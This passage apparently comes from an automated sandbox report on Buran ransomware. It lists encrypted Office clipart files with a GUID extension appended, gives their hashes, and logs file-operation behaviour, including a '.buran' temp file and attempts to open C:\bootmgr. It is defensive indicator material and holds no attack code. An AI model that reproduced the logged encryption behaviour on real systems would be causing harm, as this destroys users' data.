SSDeep: 768:r8SSd41k/RHGIE6MBNBHuHDLUDOiwlqNlO8yLYc5zO0D1jEbV9X74w1pnM6QDI4p:y1xURUL
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.42 KB MD5: 2b4e49d1c29ee90733a1f61577a49e64
SHA1: 9e6218b7d3825be0c2c0afef45da0fac36b179c7
SHA256: b35b2755ce6c2325ff0354f497575f10ecfa2bb04d5a4a4babf460e7b140ea5b
SSDeep: 384:whjh66QoPvUyeRhO7tj5bxQetvhTaN8g0BDpI5sV5J+ceyOSB/RS3bsEVD/CrkYQ:whjh66QoPvUyeRhctj5bxQetvhTaWg0i
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.27 KB MD5: 37bfce07f7705160cec66315d20569f7
SHA1: 1d37f4ee82934d131b0c75baf1f0b72ef09b2b99
SHA256: 4bc54e54dbb0e239a4850e1b14381733e3e8bf0064542f16dbdc474b8e3e740c
SSDeep: 192:BtiGbjlV8NCOhWEHWdyO0Dq77j2/90QEjV:DHXl4h92cOwq770bEjV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.86 KB MD5: db63f20f041a9bd4a18f0cc8e5c5bb36
SHA1: bbf5c485898ba7b0f1219614c609ba8e0285ec35
SHA256: fe8be1c1da9a3933645f30c464c28386d4986c08c9dc767c95e9ff7c3ed0f746
SSDeep: 192:Du5sFUqqY/7PWnb5GGVV0708Ze4QU9/Nh5reCbSk9OU8Ma3mNp/9CQvuPC6:Du+yqzTOnb5Gpo8Ze4n/NhZeCbTOvWEx
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174639.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.98 KB MD5: 3acc1fe36b45e8dafeee7d631ad13ab9
SHA1: d53e536a8d2f1507ed6ea3728f0b58ab5ed7bdfe
SHA256: 1219af482030ef52b4307efd7e5578ea064510e9fc4b3e612ee774c83d1e8d4d
SSDeep: 96:vJOjXduCx+WrTv4mV5r4yd/jqYzJyDW9cn/DMbjjA/TyCyQWp4R/y+gwR0lrpeYZ:h+XduVkTv35r4ydmOJyDW9cn/DMbjjAA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.21 KB MD5: 6360ed03283909ef673fdef46ddbf03e
SHA1: d31a883dfa9fdbaf486efcc5b053ab56bdfdbbe4
SHA256: 5144c06d66b9cc38b3d3d2017c072451a63e6d85e5926b5daec3cbd19b5c91a5
SSDeep: 384:z5M2vbu3OylLn2HCda3hA2L/zQ4D7rWLVAS6GHxeLHOs:z5VvbBaD2L7L/zQ4nMCNINs
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 54.25 KB MD5: 4d394bf384d936ecaa1814a88269996c
SHA1: 761c73b9df3a8e07f03fc61724136202bd0bb8e7
SHA256: 555673e486f6d6d8bd56d58d3a40af28e3389f8f130c886f610f63654321f901
SSDeep: 768:B8d+l8NONNpX/6uYpJ9VnCxTHNHILUw7cHJCTgXz5rH+g7YsqW28KQHTuTdQfddl:WRi/09R14bzpHV7caxTuQGVn8
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.52 KB MD5: 14d3c074a690cad15ba89bdb22749fde
SHA1: 2a8c7a9749dfbb6e722a2d328ff9c45b2f5cda6d
SHA256: 2b8270625c072568c8765840626ab7f47c06ad116b5447f2813e1836be990668
SSDeep: 768:aUDJNw5VXMTLRSVUCCDsYvF+hKtH45VI7:xMe1RCCDR945y7
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.80 KB MD5: 32e73ff97c9c286d810da93a5d3ca931
SHA1: 8cc7ae0acdcfa7bb4da5a7440394f1922e80c732
SHA256: 7b52533a426fd39c4e7ab45fe26e865216441b07eed3598a6aef156cfeb18a05
SSDeep: 384:Rs1SL4QyaKCVtx9oLZjvqMW715evZ56b01oyGs2fO/Hon3SJtombhGCLpz19+eeM:RcSL4QyaKwtPoLZjiMWxwvZ56bqoBNfy
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.64 KB MD5: e8b1784c44456405342ad84cb04924d0
SHA1: 1b91ccee552b58bcc0bc39c1facc03fb0518ee12
SHA256: b4f2238e40e0407717cd9db9fad8438cc1bbc4adea1deae339b592a06282f041
SSDeep: 192:GcbnRovDdabB/eHZexFMtHX0uI6eZvi9QKczDDTjTGxTjTwToCTQTfTZTsTlTmbQ:GOovD8bB/eHZyFuHX0uI6eZvi9QTzDDR
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.71 KB MD5: af2fc324156c93aa3b3abbb8368fb727
SHA1: ff9bdd2835cd6216da168e740f87b52068770cfd
SHA256: f38423c039e2f7eadcdce2e81ae0d219fa936c2f4fb7922edfd6ca738e003087
SSDeep: 384:MbwxfkoU+hGTXJW2WQ4sfGlSR8gNGCI8zGaMqTEgzGjXm8iCw/Yt+3U1Mn/0SbB2:MbwJFU+oTXAxQ4sfGlSR8sHI8zeqTEge
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 27.96 KB MD5: 7b95cf91f9767f71e076e2b8b1e65d99
SHA1: ccc52782734cb28424f71a08fa98082a7b8d230a
SHA256: 58c9f00a52d597c873b2b8c53f681b93a8f318f059cd833065206c54928a41e1
SSDeep: 768:bCbvthunP/4M8ABdPoUzv+14T7kBZTFhRUqugOjKZOiOLt8H7xvB6YfZ+nLV20n4:O8/7z2qeUE6NmlkmxbijfnK
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.86 KB MD5: d4824458e38b0eaea6b49d3dbd03e70a
SHA1: 3385d0deea6f5c9b5edc38ed6077664cb0b62395
SHA256: 2a2b45255e5979a8f0c330dd0ec39fb8888b5a9da3f7f7eecc8e0efd5b5e2cd2
SSDeep: 384:WRhARSwz1fex8SM2f2TYO3FXnHQba9o4LT41A/mh1gR4fg0lx7726yHIEc9Ky4Dy:Wru91fexRvoYO3pHQ+9o4n41A/mi4fge
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185778.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 24.72 KB MD5: 7b9f622f9163d6bf28c888a99fa6bfba
SHA1: 880574436e2bc83261181750ff42b6dd69c20b36
SHA256: 856e3127fbe04694f93053efaf49240cf076f47e833b12e418bf0b659fae99ae
SSDeep: 768:q3WXup/KEGTLCB7EEAfYGI2LOrSkXFlxxOqGOd5W+wCadpkXf8voH3sS9VTUFugo:6LvhmZriKiP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 38.41 KB MD5: 22618007c746c65fe6a21c6861214f5b
SHA1: f63b8564811b5fb00813d9a1efa092fabcbf5369
SHA256: 8dc6cf7b00c34df0cd327e413b71049b0d7befad9181d40ea8ae281e08587344
SSDeep: 768:r4vJ+gTTPXLVxAVmBcXhfKk3Uks8AjCp+WmotWT3OnNlF8YnEXZY5ZhPfaI6SIj+:8kgWjeAV9uVn/8QNcfZmRj6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185798.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.03 KB MD5: 8ed430aa1c51437e6be58a91ddc28871
SHA1: 52bcf15dc499479d45e187ea9f452ab059ce14f4
SHA256: 0b094bc35521f09b21849e1af967fc1e818025c0c1d45412c10071b445aaed31
SSDeep: 768:2p8zpnAMyiaA1B852XZJOzxXwXhLyRwIWPlm0JSY7PUORqWSy+/8xUjzC/lFdvZT:UzD01tVeNuPC6QZnG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.67 KB MD5: 239ebb420459d7a14616675926d0e376
SHA1: 525ae6ef8bf356751b086792643fea1caeac62ff
SHA256: 4d8aaf08f586376a167ba9e2cea1d01c9f75f7cf595979c55bf40343afe0ddb0
SSDeep: 384:pNowIR1csLKrKRoqUhDg+y+PL6qKCboLzWjW7oWYRkp4M9nPtVNTbpEcgaGfMUZE:pNotR1bKrKRozhDfvPL6qK+oLzWjW7o4
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 29.81 KB MD5: 60825a0e1c9224c20618198d8f1b30ee
SHA1: d820e57544db5da1394ef038da3799d77784af7d
SHA256: 6a22e435e572f03fff59fee1f15dfc706103516786e540d48a78ce35f8508aea
SSDeep: 768:/eU/GopDZnglNtRCoUxdk7lBjiEi3b5h1hx7WuDZDYZ+ZK/ZfXNGylJT7oC+2xeI:x9BtRvyiYzGd9VHVbW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.89 KB MD5: 5e1447635ecc604e0ed5e89ccea8a714
SHA1: ffbec90f33dd7e5fe3a4cd2d0a99aaa23dfb40fb
SHA256: 68dcbfcdab2e08b47fd32523942c685ab09143aad0c1fad3a21f98600bacd124
SSDeep: 768:yIrlYz2DviyAnYedaEcVNtpHZtY1bvfYWzMmAcjjwW21vvgdET09KxMykGaxu/6S:xxmy2YwVMLflfnGWd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.38 KB MD5: 68a704ad23db456a2a214b734fe5d52e
SHA1: 3850e09e36f7c360b7cc191b715cae0877062e3d
SHA256: 980b0bf4180e707aba1f7be1a6b22462119b1e22a89344a1f7885758b277caa2
SSDeep: 192:PIlBi4AbwmDFfsdZAHuA7YXmIeFLyZ1vJYWHWYaIS37PLX0lu5ga1Z7j61TXpOLB:PIX9o3DFkdZVA7YXXehyZ1vJYW2Y5mTR
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.97 KB MD5: d912db423f2a57d81e395dda9957cc99
SHA1: 82d950c37a2ff91eb5290ef6477a3129da1db497
SHA256: a4a9bed8a698a426e7f4a142614c85d79ccc6ad68c9c8e3886ad2dc33f81cd37
SSDeep: 384:5vphbDSFl7lmF7TTelwBgxq7wXcTt+O5XzcidA1ngVqYED6nx3gUMGBQ50Nmz7SN:5RhbDSFl7lmF7TTelwBeq7wsTt+O5XzP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.79 KB MD5: cf90c10d64acad2cb0442031aefa5804
SHA1: 375dfd32f4211b5058216e688840a1d25ac70f7c
SHA256: d76954ea71f692b19a7b623dc6bda68c1e0445525b545216617ffabbb40c1057
SSDeep: 384:mrW8+XaXMJgd23mZ+oSfGD8nANknqZy/iukEGEbemEtsPvOoxl+m4VgmcwZxJSkm:mrW8+XaXMJgd23mZ+oSfGD8nAWnqU/i0
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.37 KB MD5: 79f9063629d5531dfe36422e1b33731a
SHA1: 9d4c25e8fcf6cae4a57a46a1e78fdf80fdbf113c
SHA256: 7889f1e9feb0586c81f135428f50eadf7c2110ffec9561e47aa3410b6caf8f53
SSDeep: 192:GBql9g1WztvsaLIVCTDcb0eGnSNWq2ltFjZtzvrBkMZT0TTbTrTLmVYzDsk/P2iv:Gc9imvs7GE0eGSNWq0tFjZtzNkMZITP1
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.95 KB MD5: 726a9f54c30c983d0082a9f9d2f7a891
SHA1: 2d6a934dc11839c2cf4d0981fbbe8dec0503da90
SHA256: 2db44e24fcdf5038747fef02ead2951cb4a78b6e65106145120d96b3c3fb76b4
SSDeep: 192:Mmh64ZUkpzoRlOT6lBPk7LUfWgkU/pV3diVJdjSYQFAokgn5pzqxbH:Mmh64ZUyz/T6lBsvUfFz/pV3diVJd2YX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.53 KB MD5: 2ab94b322b91ca6805730451113c4efe
SHA1: 2164e91febe90420e25077133f7f03f890a6688f
SHA256: 1257eb6b5504da7aab61f7d296056ac26ff9f230f6a3cc86816030269bcfaece
SSDeep: 192:gGAeyigtMgOmsYAbq8pMHJ5wLj86jzZUbxsNaA81prTd+TTHTITbTJsYMkIqGVR/:gGGigGgXsYyqaMHjwLjNXibxsNaA81pa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.90 KB MD5: 16a8286eb1637a736ded7cc2af0e4c06
SHA1: 52e718ef6a3fb630493ac94a06414aa76211f3f6
SHA256: 4c798c68f60b104c0b582cf9096fa6fd86a0e40574ecd9c28920dc94499549b5
SSDeep: 192:P+kQit8T49Gv7ClAouqn0ryzqa6nnLAN77x8FXox3ZDHBV6V0WKX3q5g4j9P:P+lUc48TCioXnHqBnLo7x6oxZbBV6V0o
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.57 KB MD5: 6322456f0581cf39c49cc2756714b048
SHA1: 942ad5b03961a8947ca52daac034645709f42a11
SHA256: ffb3ecdda4bf4aa7235131965c02d27ec589f1702fd81b386f94b5864b3951a1
SSDeep: 192:DsZhs9+Szke2xL62oT7FATRMbxeOrDH7Pnxi2MeKTYHU9HfGTb2T9tYYLHy2uXIw:oZhs9+Szke2xL62oT7FATRMbxeOPH7Pb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187893.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.49 KB MD5: 153bc62f35b5583b2b99d6c547d3d641
SHA1: 66a7471499132697cc5aa81ee4b502ffe07b6067
SHA256: 3fa9e4d283c9e67359a4ccf24f257ea129909f984d46df07a3637766edc8a337
SSDeep: 96:FJcuYOacui+clXASPUCExuppY3Xrt9rYQIjAIYN1oqEvS5fsjGTRYTY6DTYLTBD/:vczxcui+cl5PxdiXrt98QIUIYbo1vS51
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187895.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.39 KB MD5: 902f1f4515c6b9cbb91371fd85cc5453
SHA1: 5a601f7b07ed5e65316a60b7ca14469c638467a4
SHA256: 912eadf04226af5c7be49697045456bf252a6caf77d2d268b600325bdfb979c2
SSDeep: 96:GAJXPv31vXM0IK1ET+HtxyLDeeDjU1PTdHpaz09S5q/T8H:lXPvdJmT+HtxyLDeeD8dHw09SCTu
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187921.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.88 KB MD5: 8dedf0195bb2086df14e02e2629e7685
SHA1: 5292936f724fd60fda0c279ed26de11f57cabb71
SHA256: ba246b995f349c4141f46bf39aedb7685e79fbb626414655b0a161683bd7a470
SSDeep: 96:wJgBLElg/sLltfmf1ElCQjOLJV/UaJWs7TQT0dhFGTs9TxMalPTkTCoTZwTg4TAz:GyLElwsRtuf19B1V8GF7TQT0bUTs9TxG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188519.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.69 KB MD5: 8baa7915bfc0fc746cf12e6208ff1cf2
SHA1: 5a0aa32ae7102a207fdc4f0031557cca9e1100c5
SHA256: 540aa14edb2cfbcd44e834cea81fc6c76872a7b079a357bd4fbc03a67a2874de
SSDeep: 96:8JJ6iFrN/EGndZONURMCLj+fo9qMipy9poUrC0udt/j8oMLfHlhuTEG9Bb+mPgrp:aFFmNEMC/+gYtpiVC5t/pMLv3MEEBb+T
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.43 KB MD5: 32063229695009fc9586ade50f55a8a1
SHA1: ffe4f09e39a945ba85d960cf6dbba6578d3b1337
SHA256: 78b811e08984bccf8ab56eaa91e25556631e5e64ece3aed44ff1e17e269245f5
SSDeep: 96:RdKDNto30DkivdcRubPGq+qLsSvLWRUCutQofwAbzBymrKqc:RADNto30DkidPD1+qQSvLWWBVnomr8
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.74 KB MD5: 84d14aeac06ada687c01e570a52822ef
SHA1: 7c872bfad618abc6e60e4eb664bba1a00bbc403d
SHA256: 5f0e392c9dcff542cdf93d79cc06ea06be28d7df9821b3105f152b8f29dca95f
SSDeep: 768:6eCJ2xpUz7gZE5WZaWTEGpui2c/ynpvhOyrKbiaMsPWG+zQghPHAtXJQwrIfu66w:QKcpwvGmsK/UAY1
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.83 KB MD5: 5cd5a9be2adb1cd5ed5851a4a0111e5b
SHA1: 7daafbf4b83c026dd4cb245ce5bc5ca9e44bb9aa
SHA256: 17d252b404aa15c00d08093e593646e3eb55c1506b543d17cc320cd01c13067f
SSDeep: 384:48FkfINqNyVLTK680PfXz9cwYvZwt7bqTOP7KbfULgFWbXsVJ3fqpFBNU6zpIvln:484IN6yFW8fXz9cwwZI3qTOP7KbfULgd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.19 KB MD5: a3e79218c7ec5ecaeb8b915411171576
SHA1: 36c7a05ca1c062dc34b6c288f250c4b40b2bca4b
SHA256: 42500896b5371aa32d29bf0e9a1e68ffd8fe5e8e62eaa24d7588ec41de8d7661
SSDeep: 384:DFFQoqJYGGrCTm24plPwZJHE6o8/mDCoITClAW8a/RIyJ2z7vLikcG1t4vYbzMgo:DFFQoqJYGGrCK2clPwZJHE6o8/mDCpTQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.93 KB MD5: d67b9bb620dc601cd34314c732617aeb
SHA1: c1a1e37c55739064b5ab7ea2fd92d1039ce0c6f6
SHA256: 5c623f856ccf13f7d3e902ca0ff4984542e1a229d9782c0bce34cab630093e3f
SSDeep: 48:1+kOqB4gYTqe3BARxYTX/WZjQdp154JasaMa1wOrxyTy/yBOHO5kAY4DZwtW:skOs/6BAGvWZjK15YasBa1wyxyTy/yB3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.74 KB MD5: f3d9efa07ad906339c420c1b8993f2ec
SHA1: d7c99eb1f8d25bc0ab8f8dcd0b8066a035f35001
SHA256: 8525970e0055f45745fcbf669dfdcde29a921b383a4bbc1757c8defa8b20ba38
SSDeep: 96:VN22YGnMCzd5OpkdsoRVT+RrE+zzyStUsDDS3DPjD:Wtm7OZoRkZE8yStUsPS3DPjD
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.38 KB MD5: f5fae6ce337d4338c4f6b3e581bc21d1
SHA1: 11a16a81c379c08f84c5fdbb867728558dfc5317
SHA256: 7a333381b5e8206d3c94e5c4b5cc8e9c1cd793d19aba082f797573885c24a6e1
SSDeep: 384:KEMyT8EAFIvYGfKDtIfEOxO7blNtgBziCHkYMnbWnxH7bWTW0Aj0b1p6bFlp7d4W:KjyT8EAFIrfatIEOxO7blNtgBziCEYMI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 39.29 KB MD5: a1520f8e477cc2c51b2156f9b0faab12
SHA1: 80a8ea8ebcbef0328f30ff697e47bdb4eb04477f
SHA256: f538e52263b2060c3899212c1e177d0c85a674522613b9f582525d5e50ffceea
SSDeep: 768:wSCsCm/FYul/Ycv2ZnOAKbEgrJu0NzYCLQ8hV1Gz:2sCeP9YcOWJu0CCLz8z
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.64 KB MD5: 147521eceb01ae186c37b17c9ea83d91
SHA1: 93f875cdcdfa28c05a490a7f56f96812580fb1a5
SHA256: b3a32bba6253e3af2d6ed4b239535c19a71b34901df9ac847b00a54022de51d7
SSDeep: 768:JbAGYRCorlYPmynEgcNyICltsLMBj0xhLRh7J4B1dIU2nf:RurrWACltNjOLRh7I1qUE
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.15 KB MD5: e6f3a44d63640d7d12da08ac5ad17127
SHA1: 86a6ea59aead57a107265cf7298e3fabd28a6981
SHA256: 65e41be285207415dacaf60dd9fb0b2d103f8e1a8fecbb528eb9c9615ac64370
SSDeep: 768:JmKV1lamISslEzSYf2SwrWP50EHCqTn1NNHQpRFselBwe0G2+:JmKlslWNfiE0EHVTn1NtQz0GL
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.54 KB MD5: a367ff68e9d4d1be608d33bbb74b3f2c
SHA1: ab03ee658e9c8c8e8e82ca0ae6a18ac10532096d
SHA256: a8aa58e1e5aca7a33a3cfa87b082a1888255a967a8cd70731b659239e342602c
SSDeep: 384:rkB57WgllG0t6hlV1MwsXNbkTPllOgqwY7Xeqq1XEYIbc8ktF0KGLs3:257h8x1bWkTPllOgnaXeqq1KUF0KAs
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 53.68 KB MD5: faa6a57d18e5912517afb56e61bbf7ae
SHA1: 3b4c86040e25a5068d9080fd614e5cbdc725505d
SHA256: 27c0f565b0050e650acb1e65824d91dc86a5c369c56a4b12ccf7f1cfb604c44f
SSDeep: 768:L28vgA58O3Swr//q0CGRF9kIp8ecsoBHwmj4OxtHRfbapNtzOUlqHFoAa8fuGP8I:R980JrXqdGvdp8ecf54OxthertSU2zaC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 40.92 KB MD5: e847a60dad540b36fd83be21702c6384
SHA1: 8d6543f6151832290b937814e0306582b5c635a3
SHA256: 4545f2f9fd9abfa5b44c731ad0f3c20f04df5a5187a6e9338963eb7bd1e0a76f
SSDeep: 768:9erN3tQbEv5B7TRPNnMBoiFoRtBJk/zBfLYkqUPd4gh8H+892Kqd:uNd7B3RPVMBo4ov0MDwdlae89nq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 41.66 KB MD5: b4cde9b580fd03485a1aafffa339671f
SHA1: 33c3953b58400a0e5d83392b73b0304923599f31
SHA256: 50eb348d387dbe3c42a8460c9993f315f90c7ec62b3e900d7952cab2829c5cad
SSDeep: 768:M43rBsMVdlX+bW48ak3RVZoB2vKosy57+i+7+CKntjrRahC5DScZQj/V:7uMNX+bW49k9E2Sosy57+qCKnlrRMaS1
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 27.90 KB MD5: 9e903715b6736f0f48a792762a1dedd3
SHA1: 3eee17b7f539055d1a7a5b531c1c1ccf9a2b4c4c
SHA256: a61f57d24902f7361d3149be8ba6e4b0ebb2af84e1eb1d419ecf09a4d998f9d4
SSDeep: 384:PK+X13iKnByPOMRv9wZm+IgOuJiaiYbV1oPrYsL8Ydn4V4jP8ou9W0jO0GDo2:PK+YKBtM3+gaviM8ksL8Yd1/x0joo2
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 39.36 KB MD5: 832eb0eb2f303f1a9382b154d7a9404b
SHA1: 3ba6abef5292a68f4f9e5a76a7286445b63e4b7d
SHA256: 7088438d944bf056457edc07570a94046a01f18e239f3ab828fcb1de3f6bd8e8
SSDeep: 768:qGwMiWJF6F6nt0XNAshX/w00RW/kbcyI63TPLzVXKA5:LwMvSQnCXNAOIFUkbcyIqVXf
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 48.51 KB MD5: 0fd9dca4b1b2ace9c16d260340bf5edb
SHA1: 728d496bde7bd43fa718fe67f3f8239a78d2a7a8
SHA256: 604e636676007fe95933f9963aaf185f5e46baba7bf6e89d1913a0a9e83d738c
SSDeep: 1536:z6ehXKTMqFAX2ypGhsl7vGhIq0zt5271e0G:zfKg/2psshjE0G
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 43.51 KB MD5: a2b8bdb4b0c9669a30515ed27cea9629
SHA1: 269dfb1ddc01a0b3f229edeb983cddd3196e8e57
SHA256: ae06d03c8ddd804c37b139094f902614c9dc78581518917e69fb7d92ff8b476f
SSDeep: 768:06guG6SLfp5BkpnhYRYlXL4jSpjRzy9vvD6eLXyY5i7xPs0LvG/d5CBXNw:lgnlepnhXbjpQ76e7p87xk0LidCXe
False
Host Behavior
File (6657)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\bootmgr desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 2
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107314.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107328.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107358.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107364.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
